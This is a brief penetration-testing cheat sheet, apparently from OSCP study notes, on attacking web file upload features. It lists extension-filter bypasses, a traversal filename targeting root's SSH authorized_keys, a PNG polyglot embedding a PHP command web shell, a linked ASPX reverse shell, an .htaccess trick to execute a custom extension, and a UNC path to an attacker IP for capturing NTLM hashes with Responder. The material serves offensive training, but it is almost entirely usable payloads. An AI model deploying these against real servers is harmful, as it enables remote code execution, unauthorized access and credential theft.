// notes/ Web Exploitation
🕸️
File Upload
Notes from oscp.adot8.com — web applications.
#web applications#adot8
source · oscp.adot8.com · web-applications/file-upload ↗File Upload
code
01.pHP .php%00 .asp .pl02.phps .php%20 .aspx .cgi03.php2-7 .php%0a .ashx04.phar .php%00.png .jsp05.phtml .php#png .jspx06.pht .png.php .jswIf the web application indicates that the file already exists, we can use this method to brute force the contents of a web server
Combined with directory traversal
code
01../../../../../../../test.txt02../../../../../../../root/.ssh/authorized_keys <-- include public keyMagic Bytes
Only include the first and last bytes of an approved file type and inject php code in the middle
<pre><code>�PNG ����lk�7�,ZtSoftwareAdobe ImageReadyq�e<3�IDATx��� <?php system($_GET['cmd']); ����lk�7�, <strong>����lk�7�, </strong></code></pre>{% embed url="https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx" %}
.htaccess
Upload a new .htaccess file and allow a new file extension to be executed
code
01AddType application/x-httpd-php .pwnedNow upload a reverse shell with the .pwned extension
Responder + File upload
Spin up responder and change file name to share and watch the hashes fly
code
01"\\\\192.168.45.237\\adot8"